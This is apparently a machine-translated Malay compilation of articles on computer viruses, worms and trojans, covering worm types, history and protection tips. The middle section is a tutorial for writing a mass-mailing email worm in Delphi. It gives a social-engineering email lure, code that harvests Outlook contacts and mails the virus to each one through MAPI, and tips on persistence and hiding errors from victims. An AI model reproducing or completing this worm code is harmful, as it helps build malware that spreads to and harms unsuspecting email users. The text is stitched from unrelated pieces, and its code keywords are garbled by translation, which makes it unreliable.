Apakah virus komputer, Trojan dan worm, dan apakah perbezaannya? Apakah perbezaan antara worm, trojan dan virus

Cara utama cacing berbeza antara satu sama lain ialah cara cacing itu merebak. Tanda-tanda perbezaan lain ialah kaedah melancarkan salinan cacing pada komputer yang dijangkiti, kaedah pengenalan ke dalam sistem, serta polimorfisme, stealth dan ciri-ciri lain yang wujud dalam jenis perisian berniat jahat lain (virus dan Trojan).

Jenis cacing

Bergantung pada cara mereka menembusi sistem pengendalian, worm dibahagikan kepada:

  • cacing surat(Mail-Worm) - cacing yang tersebar dalam format mesej e-mel. Dalam kes ini, worm menghantar sama ada salinan dirinya sebagai lampiran kepada e-mel atau pautan ke failnya yang terletak pada beberapa sumber rangkaian (contohnya, URL ke fail yang dijangkiti yang terletak di tapak web yang digodam atau penggodam). Dalam kes pertama, kod cacing diaktifkan apabila lampiran yang dijangkiti dibuka (dilancarkan), pada yang kedua - apabila pautan ke fail yang dijangkiti dibuka. Dalam kedua-dua kes, kesannya adalah sama - kod cacing diaktifkan.
  • cacing IM(IM-Worm) - cacing yang menggunakan messenger Internet. Cacing komputer jenis ini yang dikenali menggunakan satu-satunya kaedah penyebaran - menghantar mesej kepada kenalan yang dikesan (dari senarai kenalan) yang mengandungi URL ke fail yang terletak pada beberapa pelayan web. Teknik ini hampir sepenuhnya mereplikasi kaedah mel yang serupa yang digunakan oleh cacing mel.
  • cacing P2P(P2P-Worm) - cacing yang merebak menggunakan rangkaian perkongsian fail peer-to-peer. Mekanisme pengendalian kebanyakan cecacing ini agak mudah - untuk menyusup ke rangkaian P2P, cecacing hanya perlu menyalin dirinya ke direktori perkongsian fail, yang biasanya terletak pada mesin tempatan. Rangkaian P2P menguruskan semua kerja yang lain untuk menyebarkan virus - apabila mencari fail pada rangkaian, ia akan memaklumkan pengguna jauh tentang fail ini dan menyediakan semua perkhidmatan yang diperlukan untuk memuat turun fail dari komputer yang dijangkiti. Terdapat cecacing P2P yang lebih kompleks yang meniru protokol rangkaian sistem perkongsian fail tertentu dan bertindak balas secara positif kepada permintaan carian - manakala cecacing itu menawarkan salinan dirinya untuk dimuat turun.
  • Cacing dalam saluran IRC(IRC-Worm). Jenis cacing ini, seperti cacing e-mel, mempunyai dua cara untuk menyebarkan cacing melalui saluran IRC, mengulangi kaedah yang diterangkan di atas. Yang pertama melibatkan penghantaran URL ke salinan worm. Kaedah kedua ialah menghantar fail yang dijangkiti kepada beberapa pengguna rangkaian. Dalam kes ini, pengguna yang diserang mesti mengesahkan penerimaan fail, kemudian simpannya ke cakera dan bukanya (jalankannya untuk pelaksanaan).
  • Cacing rangkaian(Net-Worm) - cecacing rangkaian lain, antaranya masuk akal untuk membezakan cecacing Internet dan cecacing LAN secara tambahan
    • cacing internet- cacing yang menggunakan protokol Internet untuk merebak. Selalunya, jenis cacing ini merebak menggunakan pemprosesan paket asas yang tidak betul bagi susunan protokol TCP/IP oleh sesetengah aplikasi.
    • Cacing LAN- cacing merebak melalui protokol rangkaian tempatan

Pada asasnya, semua orang merujuk kepada sebarang jenis perisian berniat jahat sebagai "Virus Komputer", tetapi sebenarnya ini tidak betul. Terdapat banyak jenis perisian hasad, termasuk virus, Trojan dan cecacing, dan setiap jenis mempunyai tingkah laku sendiri dan merebak secara berbeza.

Daripada nama "virus komputer," adalah lebih tepat untuk menggunakan "perisian hasad," kerana Virus komputer hanyalah satu lagi jenis perisian hasad, seperti Trojan atau cecacing. Jadi jika anda mahukan istilah umum untuk program yang tidak diingini dan buruk, maka gunakan perkataan malware. Tetapi program antivirus tidak peduli apa nama perisian hasad atau jenisnya - mereka boleh mengalih keluar Trojan, virus, cecacing dan jenis perisian hasad lain. Tetapi dalam artikel ini kita tidak akan bercakap tentang program antivirus; kami akan memberitahu anda tentang jenis utama perisian hasad, iaitu, apa itu virus, Trojan dan worm, dan apakah perbezaan di antara mereka.

Virus komputer menjangkiti fail dan program lain, sama seperti virus biologi menjangkiti sel hidup. Dalam kebanyakan kes, virus menjangkiti fail dengan sambungan .exe, jadi dengan sendirinya, hanya berada dalam memori cakera keras, virus tidak boleh menjangkiti fail lain, tetapi hanya apabila fail .exe dengan virus itu dilancarkan. Ringkasnya, jika anda membuka fail .exe yang mengandungi virus, barulah virus itu mula merebak.

Sesetengah jenis virus komputer juga boleh menjangkiti jenis fail lain, seperti makro dalam dokumen Word atau Excel. Virus sedemikian boleh merebak melalui lampiran e-mel, peranti storan boleh tanggal atau folder rangkaian.

Virus komputer boleh mendatangkan malapetaka pada sistem anda. Dalam sesetengah kes, mereka boleh menggantikan fail program sedia ada sepenuhnya, bukannya seperti biasa sebagai fail tambahan kepada fail sedia ada. Ini bermakna virus memadam semua fail, dengan itu mengumumkan kehadirannya. Virus juga boleh menduduki memori sistem, menyebabkan sistem ranap.

Virus sangat berbahaya kerana... mereka merebak dengan sangat cepat.

Apakah cecacing komputer?

Cacing (dalam bahasa Inggeris: Worms) ialah program bebas yang merebak tanpa campur tangan pengguna. Jika virus merebak dengan bantuan pengguna sendiri, maka cacing melakukannya secara bebas. Tetapi mereka tidak menjangkiti fail lain; sebaliknya, mereka mencipta dan mengedarkan salinan diri mereka sendiri.

Sesetengah cecacing, seperti cecacing Mydoom yang terkenal, yang telah menjangkiti lebih daripada setengah juta komputer di seluruh dunia, menyebarkan salinannya melalui e-mel. Dan cacing lain yang sama berbahaya dan cepat merebak, seperti Blaster dan Sasser, menggunakan kelemahan rangkaian dan bukannya menggunakan e-mel. Mereka mengembara merentasi rangkaian dan menjangkiti sistem lapuk dan terdedah yang tidak mempunyai tembok api.

Worm yang merebak merentasi rangkaian boleh menjana sejumlah besar trafik, memperlahankan rangkaian. Dan selepas ia masuk ke dalam sistem, ia boleh melakukan tindakan yang sama seperti virus berniat jahat.

Apa itu Trojan?

Trojan dinamakan sempena kuda Trojan mitologi. Untuk menakluki Troy, orang Yunani membina kuda kayu yang besar dan memberikannya kepada Trojan sebagai hadiah. Trojans menerima hadiah itu ke dalam bandar mereka. Kemudian pada malam itu, tentera Yunani muncul dari kuda kayu dan membuka pintu bandar - dan apa yang berlaku selepas itu, anda boleh bayangkan.

Kuda Trojan adalah perkara yang hampir sama dalam komputer. Kuda Trojan menyamar sebagai program yang berguna, i.e. menampilkan dirinya sebagai program biasa dan berguna, contohnya, program seperti Russifiers, penjana utama, dsb. Sekali dalam sistem anda, Trojan membuka pintu belakang pada sistem anda i.e. kelemahan (kelemahan).

Kemudian, pengarang Trojan ini akan menggunakan celah ini untuk tujuannya sendiri. Sebagai contoh, ia boleh menggunakan sambungan Internet anda untuk aktiviti haram yang akhirnya hanya akan menghala kepada anda. Atau untuk memuat turun program berniat jahat yang lain, secara umum, melalui pintu belakang ini pengarang Trojan boleh melakukan apa sahaja.

Ancaman lain

Terdapat jenis perisian hasad lain, berikut adalah beberapa daripadanya:

  • Perisian pengintip- Ini adalah program berniat jahat yang akan memantau tindakan anda pada komputer. Contohnya, "Keyloggers" (keyloggers) boleh mengingati kekunci atau kombinasi kekunci yang anda tekan dan menghantarnya kepada penciptanya. Mereka boleh mencuri maklumat kad kredit anda, kata laluan perbankan dalam talian, dsb. Perisian pengintip direka untuk menghasilkan wang untuk penciptanya.

  • Scareware- juga dikenali sebagai perisian penipuan. Mereka kebanyakannya muncul sebagai amaran antivirus palsu pada halaman web. Jika anda percaya amaran itu dan memuat turun program antivirus palsu, selepas memuat turun program itu akan memaklumkan kepada anda bahawa terdapat virus pada sistem anda dan meminta nombor kad kredit atau mendesak pembayaran supaya program itu menghapuskan virus. Program ini akan menahan tebusan sistem anda sehingga anda membayar atau menyahpasang program.

Sentiasa pastikan sistem pengendalian anda dan program lain pada komputer anda dikemas kini dan sentiasa ada program antivirus untuk melindungi diri anda daripada jenis ancaman ini.

Adakah anda masih mempunyai soalan mengenai topik virus komputer, Trojan dan jenis perisian hasad lain? Tinggalkan komen dan kami akan menjawab sebarang soalan yang anda ada.

Hari ini saya akan menerangkan kepada anda prinsip pengendalian virus rangkaian. Topik, seperti yang anda faham, sangat relevan, kerana 70% peti mel peribadi saya sentiasa dipenuhi dengan virus dari semua jenis
- dari cacing VBS yang kecil tetapi jahat kepada satu setengah megagram karya kanak-kanak sekolah rendah :) Mereka tidak tahu tentang kewujudan WinAPI :)

Untuk menembusi komputer, virus boleh sama ada menggunakan pepijat dalam perisian pengguna (VBS+Outlook=love:)) atau pepijat dalam kepala pengguna. Mari kita lihat contoh surat viral tersebut:

Subj: Kelakar
hello! Simpan jenaka keren yang saya janjikan kepada anda (atau tidak kepada anda, saya tidak ingat :)). Tapi simpanlah. Jangan risau, ia sebenarnya tidak memformat apa-apa!
Jangan lupa periksa, paranoid :)
Semoga berjaya!
Lampirkan: fake_format.exe

Nah, inilah: setiap pengguna Internet yang lumpuh sentiasa menghantar jenaka kepada rakan-rakannya, dan, oleh itu, tidak benar-benar ingat kepada siapa dia berjanji untuk apa; mesej tentang "pemformatan palsu" menukar otak mangsa kepada jenaka, dan kepercayaan buta terhadap antivirus
- selesai 🙂 Biar saya ingatkan anda bahawa algoritma yang saya terangkan tidak ditentukan oleh mana-mana web, avp dan pejuang lain.

Pendek kata, saya sendiri sudah mahu memulakan gurauan lucu ini. Saya melancarkannya :)

Ralat... intel pentium 5 tidak ditemui!

Oh... Nampak tak berkesan? Tidak, saya tidak sangka 🙂 Sebenarnya, virus itu segera memindahkan badannya ke cakera keras mangsa, mendaftar untuk permulaan, dan kini akan melepak dalam RAM (petunjuk: dalam jargon perubatan, “RAM” ialah PEMBEDAHAN OPERATIF, jadi berhati-hati;)) mangsa mengikut prinsip yang saya jelaskan dalam artikel "Virus Penduduk Do-It-Yourself." Hanya ia tidak akan menyemak pelancaran fail, tetapi sambungan ke Internet 🙂 (dalam kod sumber ini akan menjadi prosedur IsOnline, jadi untuk masa depan;)). Namun, pada masa yang sama
tiada siapa yang menghalang anda daripada memantau pelancaran fail
- ia masih virus, walaupun ia virus rangkaian. Oleh itu, saya akan memasukkan prosedur InfectFile dalam logik. Jadi kami akan menggunakan fungsi dan prosedur berikut:

ISONLINE - menyemak sambungan Internet
SENDVIRUS - teka tiga kali 😉
GETMAILS - dapatkan alamat daripada Outglitch's AddressesBook
INFECTFILES - 🙂
WORKMEMORY - hampir sama seperti dalam artikel sebelum ini, tetapi dengan pengubahsuaian.

PENGEkodan

Sebelum pengekodan sebenar bermula, kali ini banyak belaian awal akan diperlukan :) Saya akan menerangkan sebabnya: untuk membaca buku alamat, kami akan mengakses Outlook melalui antara muka antara program, dan untuk ini tidak salah untuk kami menggunakannya perpustakaan taip. Jadi lakukan: perpustakaan jenis import projek, dan lihat di sana... betul, Outlook express v.9 atau apa sahaja yang anda miliki. Versi kesembilan dianggap, jika tidak silap, dari Office2k. Diimport? Apakah maksud "tiada dalam senarai"? Okay, ia berlaku. Cari secara manual
— dalam direktori dengan pejabat terdapat fail msoutl.olb. Ini dia 😉 Sekarang tulis outlook_tlb di bahagian kegunaan dan anda akan mempunyai akses ke tempat paling intim dalam buku alamat anda 🙂 Oh, saya agak sibuk hari ini 😉
Secara umum, prosedur untuk membuang buku alamat sepatutnya kelihatan seperti:

kegunaan
ComObj, outlook_tlb,
Borang;
….
Prosedur DAPATKAN SURAT;
var
MyFolder, MSOutlook, MyNameSpace, MyItem: Variant; s:rentetan;
nombor, i: Integer;
mel: pelbagai rentetan;

bermula
MSOutlook:= CreateOleObject('Outlook.Application');
MyNameSpace:= MSOutlook.GetNameSpace('MAPI');
MyFolder:= MyNamespace.GetDefaultFolder(olFolderContacts);
SetLength(mel,MyFilder.Items.Count);
for i:= 1 to MyFolder.Items.Count do
bermula
MyItem:= MyFolder.Items[i];
mel[i]:= myitem.email1adres;
akhir;

Nah, adakah anda menikmati apa yang saya tulis? Wah, ia hanya akan menjadi lebih teruk. Kerana virus akan dihantar menggunakan API tulen. Dan ini, seperti yang dikatakan Horrific: "sama seperti seks manual. Terdapat kesan dalam kedua-dua kes, tetapi ia mengambil masa yang lama untuk mencapainya dan tiada buzz seperti itu” :) Nah
jadi apa yang saya tulis di sini? Penggunaan Comobj membolehkan kami bekerja dengan teknologi COM; Seterusnya, kami hanya mencipta objek OLE Outlook dan secara kitaran mendapatkan senarai e-mel daripadanya. Jika anda ingin mengetahui apa-apa lagi
- ini juga nyata, baca dokumen - mereka memerintah. Walaupun dalam bahasa Inggeris. Senarai e-mel ditulis kepada tatasusunan rentetan dinamik. Ia akan digunakan oleh fungsi SendVirus. Yang ini:

fungsi SendVirus(const RecipName, RecipAddress, Subject, Attachment: string): Boolean;
var
MapiMessage: TMapiMessage;
MapiFileDesc: TMapiFileDesc;
MapiRecipDesc: TMapiRecipDesc;
i:integer;
s:rentetan;
bermula
dengan MapiRecipDesc ​​mulakan
ulReserved:= 0;
ulRecipClass:= MAPI_TO;
lpszName:= PChar(RecipName);
lpszAddress:= PChar(RecipAddress);
ulEIDSize:= 0;
lpEntryID:= tiada;
akhir;

dengan MapiFileDesc bermula
ulReserved:= 0;
flBendera:= 0;
nKedudukan:= 0;
lpszPathName:= PChar(Lampiran);
lpszFileName:= tiada;
lpFileType:= tiada;
akhir;

dengan MapiMessage bermula
ulReserved:= 0;
lpszSubject:= nil;
lpszNoteText:= PChar(Subjek);
lpszMessageType:= tiada;
lpszDateReceived:= nil;
lpszConversationID:= tiada;
flBendera:= 0;
lpOriginator:= nil;
nRecipCount:= 1;
lpRecips: = @MapiRecipDesc;
jika panjang(Lampiran) > 0 maka mulakan
nFileCount:= 1;
lpFiles: = @MapiFileDesc;
akhir lain bermula
nFileCount:= 0;
lpFiles:= tiada;
akhir;
akhir;

Keputusan:= MapiSendMail(0, 0, MapiMessage, MAPI_DIALOG
atau MAPI_LOGON_UI atau MAPI_NEW_SESSION, 0) = SUCCESS_SUCCESS;
akhir;

Adakah anda bengkak semasa membaca ini? Pergi dan minum bir, jika tidak, anda tidak akan memahami apa-apa.
Adakah awak minum? Saya pun 😉 Okay, jom sambung. Anda akan menggunakannya seperti ini:

Untuk i:= 1 hingga panjang (mel) lakukan
bermula
SendVirus(",mel[i],'pricol','..');
akhir;

Kami akan menggunakan kegunaan MAPI di sini, jadi jangan lupa untuk mengisytiharkannya. Pendek kata, ini
— kerja peringkat rendah dengan mel. Dan untuk bekerja dengan mel, seperti yang anda tahu, anda perlu mempunyai a)
e-mel penerima b) teks surat c) lampiran. Inilah yang saya lakukan:
MapiRecipDesc ​​​​ - terangkan penerima, MapiFileDesc - lampiran,
mereka. virus kami, MapiMessage, adalah mesej, maka saya akan menghantarnya ke dunia besar dengan arahan MapiSendMail 😉 Nah, ternyata tidak begitu sukar. Perkara utama ialah memahami bahawa kawan terbaik anda
- ini bukan c:\porno, tetapi win32.hlp :)

Bagaimanakah kita boleh memasukkan semua kata-kata ini ke dalam logik keras virus itu? Anda akan fikirkan sendiri, saya telah memberitahu anda tentang perkara ini untuk 2 artikel berturut-turut. Lagipun, saya menyambut hari jadi teman wanita saya semalam, dan sekarang kepala saya sedikit berdebar :) Baiklah, okey, rasa kewajipan lebih kuat. Buat sahaja:
Baris pertama adalah untuk menyemak nama fail dari mana anda bermula. Jika
pricol.exe bermaksud CopyFile ke Windows :) Dan jika anda bermula dari direktori Windows
- kemudian semak kitaran sambungan anda ke rangkaian 😉 di seluruh dunia. Kami menyemak:

function IsOnline: Boolean;
var
RASConn: TRASConn;
dwSize,dwCount: DWORD;
bermula
RASConns.dwSize:= SizeOf(TRASConn);
dwSize:= SizeOf(RASConns);
Res:=RASEnumConnectionsA(@RASConns, @dwSize, @dwCount);
Keputusan:= (Res = 0) dan (dwCount > 0);
akhir;

Jadi. Jika semuanya baik-baik saja, teruskan - goncang buku alamat anda dan hantar mel. Terdapat dua helah di sini. Jika nama anda
pricol.exe - segera semak sambungan. Pengguna mungkin menyemak e-mel dalam talian. Ini akan meningkatkan peluang kita untuk mendapatkan surat berita. Anda sendiri telah mengetahui helah kedua,
iaitu, dalam senario yang saya terangkan, anda akan sentiasa menghantar surat yang sama kepada pengguna yang sama, hanya kerana dia tidak dipadamkan daripada buku alamat. Oleh itu, tulis semua alamat yang diproses dalam fail log dan sentiasa menyemaknya. Itu rupanya. Walaupun tidak. Jangan lupa untuk menyertakan serpihan kod yang terdedah kepada ralat dalam percubaan..kecuali. Dan letakkan kunci ($D-). Kerana jika pengguna tiba-tiba menangkap ralat seperti "'FUCK' bukan nilai integer yang sah," dia akan mengesyaki sesuatu.

KESIMPULAN

Artikel terakhir ini adalah mengenai virus yang dinyahpenyah untuk Windows 9x. Saya baru-baru ini memformat skru dan memasang WindowsXP Professional, jadi contoh berikut adalah untuknya. Dan anda sudah boleh perlahan-lahan membeli Delphi 7, kerana saya menyemai keenam saya di suatu tempat, dan sekarang saya duduk telanjang sepenuhnya :) Saya akan membeli ketujuh, dengan sewajarnya 😉

Artikel seterusnya mungkin akan ditumpukan kepada steganografi dan pelaksanaan praktikalnya.

Cacing rangkaian(nama lain ialah cecacing komputer) ialah program yang dicipta dengan mekanisme dalaman untuk merebak ke rangkaian komputer tempatan dan global untuk tujuan tertentu. Matlamat ini ialah:

  • penembusan ke dalam komputer jauh dengan pemintasan separa atau lengkap kawalan ke atasnya (tersembunyi daripada pengguna - pemilik komputer ini, sudah tentu);
  • melancarkan salinan anda pada komputer anda;
  • pengedaran lanjut ke atas semua rangkaian yang tersedia, tempatan dan global.

Mari kita senaraikan beberapa jenis rangkaian yang mana cacing rangkaian dihantar. Ini, pertama sekali, sudah tentu, e-mel, pelbagai messenger segera Internet, perkongsian fail dan rangkaian torrent, rangkaian tempatan, rangkaian pertukaran antara peranti mudah alih.

Cacing komputer terutamanya diedarkan dalam bentuk fail. Ia dilampirkan sebagai lampiran pada e-mel dan mesej, atau dalam pelbagai cara pengguna dijemput untuk mengikuti pautan tertentu, memuat turun dan menjalankan pada komputer tempatannya beberapa program, foto, dll yang sangat diperlukan dan percuma. (terdapat banyak pilihan untuk menutup virus rangkaian). Harus dikatakan bahawa e-mel telah menjadi tempat pembiakan yang hampir ideal untuk penyebaran cacing rangkaian. Dan kelajuan mereka (cacing rangkaian) merebak ke seluruh Internet selalunya menakjubkan.

Tetapi terdapat juga yang dipanggil virus rangkaian "tanpa fail, paket" yang merebak dalam bentuk paket rangkaian dan menembusi komputer menggunakan pelbagai lubang dan kelemahan dalam sistem pengendalian atau perisian yang dipasang.

Untuk menembusi komputer jauh, pelbagai kaedah digunakan, mulai daripada kaedah kejuruteraan sosial (apabila anda menerima sejenis surat yang menggoda dengan pautan atau fail yang dilampirkan, menggesa anda sama ada membuka fail yang dilampirkan ini atau mengikuti pautan yang ditentukan), atau, seperti yang telah ditulis di atas, penembusan ini melalui kelemahan dan pintu belakang dalam perisian yang digunakan. Penembusan juga mungkin disebabkan oleh kelemahan sedia ada dalam perancangan dan penyelenggaraan rangkaian tempatan (contohnya ialah cakera tempatan yang dikongsi sepenuhnya dan tidak dilindungi).

Selain fungsi utamanya cacing rangkaian Selalunya ia juga mengandungi fungsi perisian berniat jahat lain - virus, Trojan, dll.

Seperti yang ditunjukkan oleh statistik daripada makmal anti-virus, lebih daripada 80% daripada semua masalah yang berkaitan dengan penembusan perisian berniat jahat (cecing rangkaian, Trojan dan virus) ke komputer tempatan pengguna dikaitkan dengan buta huruf asas dan kekurangan kemahiran Internet yang diperlukan di kalangan ini pengguna yang sama.

Mari kita lakukan lawatan singkat ke dalam sejarah dan ketahui dari mana dan bagaimana ia berasal, program berniat jahat ini - cecacing komputer.

Eksperimen pertama, di mana prototaip pertama cacing komputer digunakan, telah dijalankan pada tahun 1978 di Pusat Penyelidikan Xerox di Palo Alto. Pemula kerja ini ialah John Schoch dan Jon Hupp. Istilah "cacing rangkaian" itu sendiri timbul di bawah pengaruh kesusasteraan fiksyen sains (khususnya, novel oleh D. Gerrold "When Harley Was One Year Old" dan D. Brunner "On Shock Wave").

Mungkin cacing rangkaian yang paling terkenal ialah apa yang dipanggil "Morris Worm," yang ditulis pada tahun 1988 oleh pelajar Universiti Cornell R. Morris Jr. Virus itu melanda rangkaian pada 2 November 1988, dan dengan cepat merebak ke sejumlah besar komputer yang disambungkan ke Internet.

Terdapat pelbagai jenis cacing rangkaian. Pertama sekali, kita harus menyebut cacing pemastautin RAM, yang terletak dalam RAM komputer tanpa menjejaskan fail pada cakera keras. Menghilangkan cecacing komputer sedemikian agak mudah - hanya mulakan semula sistem pengendalian, ini akan menetapkan semula data dalam RAM, dan dengan itu cecacing itu akan dipadamkan. Virus pemastautin RAM terdiri daripada dua bahagian: eksploitasi (atau kod shell) yang digunakan untuk menembusi komputer, dan badan cacing itu sendiri.

Terdapat juga virus yang, apabila berjaya menembusi komputer, melakukan tindakan tertentu dengan cakera tempatan: mereka menulis beberapa kod program di sana (contohnya ialah mengubah suai kunci dalam pendaftaran Windows atau mendaftarkan fail virus dalam Startup). Juga cacing Jika ia berjaya menembusi komputer, ia boleh memuat turun secara bebas sebarang fail tambahan melalui rangkaian (virus, Trojan, cecacing rangkaian lain) dan menjadikan komputer anda tempat pembiakan untuk sebarang jangkitan komputer.

Ia agak sukar untuk dikesan dan, dengan itu, meneutralkan cacing rangkaian ini. Program antivirus dengan pangkalan data tandatangan virus yang dikemas kini akan membantu anda dengan ini.

Mereka adalah jenis virus yang khusus dan istimewa. Persekitaran untuk perisian hasad biasa ialah sistem fail, manakala cecacing mencapai peranti kami melalui rangkaian. Di samping itu, mereka boleh masuk ke dalam PC bukan sahaja melalui e-mel atau Internet, mereka juga tertakluk kepada orang lain.Oleh itu, topik artikel ini adalah cacing rangkaian dan perlindungan terhadap mereka. Lagipun, mereka menembusi melalui rangkaian pengendali rangkaian mudah alih, dan rangkaian LAN tempatan, dan rangkaian IRC untuk sembang, dan rangkaian P2P yang direka untuk pertukaran fail terus antara pengguna secara langsung, dan rangkaian perkhidmatan yang digunakan untuk pemesejan segera.

Sedikit sejarah cacing rangkaian

Maklumat pertama tentang tindakan mereka muncul pada tahun 1978. Jon Hupp dan John Schoch, pengaturcara di Xerox, tertanya-tanya tentang pengumpulan dan pemprosesan maklumat dari semua komputer ke satu, pusat. Selepas beberapa lama, setiap PC syarikat, setelah memproses jumlah kerja yang diperlukan, menghantar hasilnya ke program yang ditulis pengaturcara kami, dan ia, sepanjang masa berada di rangkaian tempatan, memproses data dan menghantarnya ke pusat komputer. Sangat cepat rakan-rakan kehilangan kawalan program mereka dan untuk masa yang lama tidak dapat memahami apa yang sedang berlaku.

Trafik tidak terkawal muncul, kemudian seluruh rangkaian telah disekat. Setelah menyiasat masalah itu, pengaturcara menemui sejenis virus, yang dipanggil virus rangkaian. Pengguna komputer lama juga harus ingat w32.Blaster.worm, cecacing yang menjangkiti Windows dari 2000 hingga XP dan menghalang akses ke Internet dengan but semula komputer. Pada November 1988, "Morris Worm" menjadi terkenal, menjangkiti 10% daripada semua komputer dunia disebabkan oleh ralat kecil oleh pengarang kod tersebut. PC ini kekal terbiar selama berminggu-minggu, menyebabkan kerosakan kira-kira $100 juta. Oleh itu, topik seperti cacing rangkaian dan perlindungan terhadapnya adalah sangat penting dan kepentingannya hanya meningkat dari semasa ke semasa.

Jenis cecacing rangkaian dan laluannya ke dalam komputer

Apakah tugas perisian hasad ini? Yang kedua adalah untuk menembusi peranti anda, mengaktifkannya dan mula membiak, tetapi bukan sahaja dalam PC anda. Oleh itu tugas utama - untuk masuk ke peranti orang lain melalui rangkaian. Apakah mereka, jenis mereka? Bahagian utama virus ini ialah cecacing e-mel yang memasuki komputer dengan fail yang dilampirkan pada e-mel. Pengguna sendiri mengaktifkannya, cuba membukanya. Ini benar terutamanya untuk saintis komputer yang tidak berpengalaman yang tidak menyedari apa-apa yang mencurigakan dalam sambungan fail yang dilancarkan, kerana selalunya hanya fail palsu yang kelihatan.

Oleh itu, anda harus sentiasa mengikuti cadangan lama - tidak membalas surat daripada orang yang tidak dikenali. Setelah diaktifkan, virus rangkaian mencari alamat e-mel pada peranti dan menghantar salinan orang yang mereka sayangi. Dengan cara yang sama, cacing "merebak" melalui pelanggan IRC, ICQ, dan utusan serupa yang lain. Kadang-kadang mereka memasuki PC kerana kelemahan dalam sistem pengendalian, perisian dan pelayar. Terdapat jenis cecacing rangkaian lain: cecacing IRC, cecacing P2P dan cecacing IM. Kami fikir ia sudah jelas daripada nama apa yang mereka lakukan dan cara mereka masuk ke PC.

Tugas lain cacing rangkaian dan tandanya pada komputer

Prinsip operasi mereka adalah serupa dengan beberapa perisian hasad lain, contohnya, Selepas menyelesaikan tugas utama mereka, mereka mula melaksanakan tugas lain. Antaranya: memasang program untuk mengawal (dari jauh) komputer yang dijangkiti, mencuri data, memusnahkannya, iaitu segala yang diprogramkan oleh pencipta untuk mereka lakukan.

Tetapi walaupun tanpa tindakan tambahan ini, volum trafik pada peranti meningkat, prestasi berkurangan dan saluran komunikasi dimuatkan. Ini adalah tanda jelas cacing dalam sistem. Jika antivirus disekat, maka ini adalah satu lagi fakta yang perlu anda perhatikan. Akses kepada tapak perisian antivirus mungkin disekat.

Bagaimana untuk melindungi diri anda daripada cacing rangkaian?

Kami telah melihat bahagian pertama ungkapan dengan baik - cacing rangkaian dan perlindungan terhadapnya, sekarang mari kita beralih kepada yang kedua. Kami ingin segera memberi amaran kepada anda bahawa antivirus biasa dengan fungsi asas tidak akan banyak membantu anda; paling baik, ia akan mengesan fakta ancaman dan menyekatnya. Tetapi ini tidak akan menghalang syarikat perisian hasad lain daripada mengakses rangkaian anda semula. Tetapi jika PC anda disambungkan ke rangkaian, antivirus yang baik adalah prasyarat untuk operasinya.

Perlindungan terhadap cecacing rangkaian juga termasuk dalam kefungsian sistem pengendalian itu sendiri. Ia mempunyai alat untuk melakukan ini, yang, sekurang-kurangnya, mengurangkan risiko jangkitan dengan ketara. Yang utama ialah kemas kini OS automatik dan tembok api/firewall yang diaktifkan. Dalam binaan cetak rompak ini selalunya dilumpuhkan, yang boleh membawa kepada masalah yang serius. Lagipun, tembok api yang memeriksa semua data yang memasuki komputer rangkaian dan memutuskan sama ada untuk membiarkannya atau tidak.

Perlindungan pihak ketiga terhadap cecacing rangkaian

Untuk mempertingkatkan perlindungan komputer anda terhadap cecacing rangkaian, cecacing penggodaman dan virus lain, adalah disyorkan agar anda memasang tembok api pihak ketiga sebagai penyelesaian alternatif. Program sedemikian, disebabkan fokusnya yang lebih sempit, mempunyai tetapan yang lebih fleksibel. Popular di kalangan pengguna ialah: Comodo Firewall - perisian percuma sepenuhnya dan Outpost Firewall Pro - berbayar.

Untuk sentiasa dikemas kini dengan semua produk baharu dalam memerangi "jangkitan" baharu, kami mengesyorkan agar beralih kepada sumber ru senarai virus. Terdapat pelbagai jenis cacing rangkaian di sana, kemunculan yang baru dikesan, dan anda akan segera mengetahui mengenainya. Ngomong-ngomong, sebagai tambahan kepada antivirus yang terkenal, worm juga menyekat akses kepada sumber VirusInfo, yang mempunyai perkhidmatan untuk rawatan percuma peranti terhadap pelbagai jangkitan.

kesimpulan

Mari kita ringkaskan secara ringkas keseluruhan kitaran hayat pembangunan cacing rangkaian dalam beberapa ayat:

  1. Penembusan ke dalam sistem anda.
  2. Perkara penting ialah pengaktifan.
  3. Cari mangsa yang berpotensi.
  4. Pengeluaran dan penyediaan salinan.

Pengedaran salinan selanjutnya.

Sekarang buat kesimpulan anda. Kami berharap anda telah memahami dengan jelas apa itu cacing rangkaian, dan perlindungan terhadapnya adalah mungkin pada peringkat pertama. Kemudian tidak akan ada masalah. Jadi lindungi komputer anda daripada ancaman, dan anda tidak perlu menghabiskan banyak usaha untuk menangani akibatnya.